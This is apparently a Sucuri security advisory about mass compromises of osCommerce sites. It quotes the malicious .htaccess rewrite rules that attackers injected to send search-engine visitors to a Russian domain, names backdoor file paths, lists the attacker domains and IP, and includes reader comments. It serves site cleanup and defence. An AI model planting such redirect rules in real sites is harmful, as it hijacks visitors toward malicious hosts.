osCommerce attacks – kirm-sky.ru

We are seeing a very large number of osCommerce sites hacked on the last few days. If you are an osCommerce user, make sure to update it asap and check if to see if it’s been infected (also remove the file_manager.php from the admin directory).

These attacks seems to be using the same vulnerability used in previous attacks (nt02.co.in, nt04.in, etc).

The latest version consists of the following:

1 .htaccess is modified to redirect users to kirm-sky.ru, voice-nano.ru, devisionnetwork.ru, etc (just the first domain infected more than 600 sites according to Google).

This is what the .htaccess looks like:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
..
RewriteRule ^(.*)$ http://devisionnetwork.ru/suomi/index.php [R=301,L]

2 A backdoor is created inside /js/conf.php and another one at /flops.php. Make sure to remove these and search for other PHP files that are not part of the official osCommerce distribution.

3 Blackhat SEO SPAM is added to includes/application_bottom.php.


All the domains used in this attack are hosted at 91.204.48.37:

kirm-ar.ru
kirmar.ru
classwoods.ru
enterteiment-wizrd.ru
class-woods.ru
relax-july.ru
ar-kirm.ru
enterteimentwizrd.ru
tecros.ru
tutaanti.ru
kirm-sky.ru
sky-ar.ru
devisionnetwork.ru
voice-nano.ru

This is how our malware scanner detects an infected site:

OsCommerce hacked

OsCommerce hacked

We will post more details as we learn more about it. This link gives some good tips on how to secure osCommerce.


If your site is hacked and you need help, contact us a support@sucuri.net or http://sucuri.net

About David Dede

David Dede is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

  • Pingback: Tweets that mention osCommerce attacks – kirm-sky.ru | Sucuri -- Topsy.com()

  • http://www.facebook.com/people/Kyle-James-Robinson/586651010 Kyle James Robinson

    One question.

    “3 Blackhat SEO SPAM is added to includes/application_bottom.php.”

    do l remove application_bottom.php? from my root folder?

    Thanks

  • http://www.tiffanyjewelrygift.com tiffany jewelry

    I hate the 07.in and kirm-sky.ru, they attacks my site

  • Ari_rains

    tolong dibuka dong……….

Share This